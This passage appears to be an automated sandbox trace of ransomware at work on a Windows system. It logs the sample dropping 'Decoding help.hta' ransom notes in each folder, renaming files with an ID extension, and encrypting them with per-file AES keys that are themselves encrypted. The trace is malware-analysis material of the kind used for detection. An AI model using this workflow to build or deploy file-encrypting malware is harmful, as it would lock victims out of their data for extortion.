ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671bf0 [0043.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0043.351] FindNextFileW (in: hFindFile=0x671bf0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfaaff840, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0043.351] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0043.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0043.351] FindNextFileW (in: hFindFile=0x671bf0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfe3882c0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x28e, dwReserved0=0x0, dwReserved1=0x0, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0043.351] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0043.351] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 75 [0043.351] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" [0043.351] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\decoding help.hta")) returned 0xffffffff [0043.351] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.395] WriteFile (in: hFile=0x708, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x73cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0043.396] CloseHandle (hObject=0x708) returned 1 [0043.397] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0043.397] lstrcmpiW (lpString1="Decoding help.hta", lpString2="state.rsm") returned -1 [0043.397] lstrlenW (lpString="state.rsm") returned 9 [0043.397] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0043.397] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 75 [0043.397] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" [0043.397] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" [0043.397] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" [0043.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.433] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.433] CreateFileMappingA (hFile=0x708, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x704 [0043.433] CryptAcquireContextA (in: phProv=0x73cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x73cfcec*=0x3448fa0) returned 1 [0043.434] CryptGenKey (in: hProv=0x3448fa0, Algid=0x6610, dwFlags=0x1, phKey=0x73cfce8 | out: phKey=0x73cfce8*=0x671d70) returned 1 [0043.434] CryptExportKey (in: hKey=0x671d70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x73cfbe4, pdwDataLen=0x73cfce4 | out: pbData=0x73cfbe4*, pdwDataLen=0x73cfce4*=0x2c) returned 1 [0043.434] MapViewOfFile (hFileMappingObject=0x704, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x280) returned 0x4410000 [0043.465] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x73cfbe4*, pdwDataLen=0x73cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x73cfbe4*, pdwDataLen=0x73cfcf8*=0x100) returned 1 [0043.465] CryptEncrypt (in: hKey=0x671d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0x73cfce4*=0x280, dwBufLen=0x280 | out: pbData=0x4410000*, pdwDataLen=0x73cfce4*=0x280) returned 1 [0043.465] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0043.467] CloseHandle (hObject=0x704) returned 1 [0043.467] CryptDestroyKey (hKey=0x671d70) returned 1 [0043.467] CryptReleaseContext (hProv=0x3448fa0, dwFlags=0x0) returned 1 [0043.467] SetFilePointerEx (in: hFile=0x708, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.467] WriteFile (in: hFile=0x708, lpBuffer=0x73cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x73cfbe4*, lpNumberOfBytesWritten=0x73cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0043.468] WriteFile (in: hFile=0x708, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x73cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0043.468] CloseHandle (hObject=0x708) returned 1 [0043.469] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\state.rsm.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0043.469] FindNextFileW (in: hFindFile=0x671bf0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0043.470] lstrcpyW (in: lpString1=0x10bbe4b8, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0043.470] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 75 [0043.470] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" [0043.470] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\Decoding help.hta" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\decoding help.hta")) returned 0x1 [0043.470] lstrcmpiW (lpString1="Decoding help.hta", lpString2="vcredist_x64.exe") returned -1 [0043.470] lstrlenW (lpString="vcredist_x64.exe") returned 16 [0043.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*" [0043.470] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\*.*") returned 75 [0043.470] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\", lpString2="vcredist_x64.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" [0043.470] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" [0043.470] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0043.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0043.471] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x708 [0043.471] CreateFileMappingA (hFile=0x708, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x704 [0043.471] CryptAcquireContextA (in: phProv=0x73cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x73cfcec*=0x3448fa0) returned 1 [0043.472] CryptGenKey (in: hProv=0x3448fa0, Algid=0x6610, dwFlags=0x1, phKey=0x73cfce8 | out: phKey=0x73cfce8*=0x671d30) returned 1 [0043.472] CryptExportKey (in: hKey=0x671d30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x73cfbe4, pdwDataLen=0x73cfce4 | out: pbData=0x73cfbe4*, pdwDataLen=0x73cfce4*=0x2c) returned 1 [0043.472] MapViewOfFile (hFileMappingObject=0x704, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6f380) returned 0x44b0000 [0043.492] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x73cfbe4*, pdwDataLen=0x73cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x73cfbe4*, pdwDataLen=0x73cfcf8*=0x100) returned 1 [0043.493] CryptEncrypt (in: hKey=0x671d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x44b0000, pdwDataLen=0x73cfce4*=0x6f380, dwBufLen=0x6f380 | out: pbData=0x44b0000*, pdwDataLen=0x73cfce4*=0x6f380) returned 1 [0044.175] UnmapViewOfFile (lpBaseAddress=0x44b0000) returned 1 [0044.181] CloseHandle (hObject=0x704) returned 1 [0044.181] CryptDestroyKey (hKey=0x671d30) returned 1 [0044.181] CryptReleaseContext (hProv=0x3448fa0, dwFlags=0x0) returned 1 [0044.181] SetFilePointerEx (in: hFile=0x708, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0044.181] WriteFile (in: hFile=0x708, lpBuffer=0x73cfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x73cfbe4*, lpNumberOfBytesWritten=0x73cfcf8*=0x100, lpOverlapped=0x0) returned 1 [0044.182] WriteFile (in: hFile=0x708, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x73cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x73cfcf8*=0x500, lpOverlapped=0x0) returned 1 [0044.182] CloseHandle (hObject=0x708) returned 1 [0044.187] SetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\vcredist_x64.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0044.188] FindNextFileW (in: hFindFile=0x671bf0, lpFindFileData=0x73cfd30 | out: lpFindFileData=0x73cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaff840, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfaaff840, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xf0a0a700, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x6f398, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcredist_x64.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0044.188] FindClose (in: hFindFile=0x671bf0 | out: hFindFile=0x671bf0) returned 1 Thread: id = 251 os_tid = 0x33c [0040.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*", lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8110 [0040.831] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.831] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e4268f4, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa35bb41, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.831] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.831] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.831] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JNTFiltr.dll.mui", cAlternateFileName="")) returned 1 [0041.283] lstrcpyW (in: lpString1=0x5fb50f8, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.283] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.283] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.283] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0xffffffff [0041.283] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0041.283] WriteFile (in: hFile=0x2e0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x8a4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x8a4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.284] CloseHandle (hObject=0x2e0) returned 1 [0041.284] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.284] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JNTFiltr.dll.mui") returned -1 [0041.284] lstrlenW (lpString="JNTFiltr.dll.mui") returned 16 [0041.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.284] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="JNTFiltr.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui" [0041.284] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui" [0041.284] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jntfiltr.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows journal\\en-us\\jntfiltr.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.288] FindNextFileW (in: hFindFile=0x5d8110, lpFindFileData=0x8a4fd30 | out: lpFindFileData=0x8a4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="jnwdui.dll.mui", cAlternateFileName="")) returned 1 [0041.289] lstrcpyW (in: lpString1=0x42c4878, lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" [0041.289] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\windows journal\\en-us\\decoding help.hta")) returned 0x1 [0041.289] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jnwdui.dll.mui") returned -1 [0041.289] lstrlenW (lpString="jnwdui.dll.mui") returned 14 [0041.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*" [0041.289] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\*.*") returned 46 [0041.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\", lpString2="jnwdui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" [0041.289] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" [0041.289] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.289] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui" (normalized: "c:\\program files\\windows journal\\en-us\\jnwdui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows 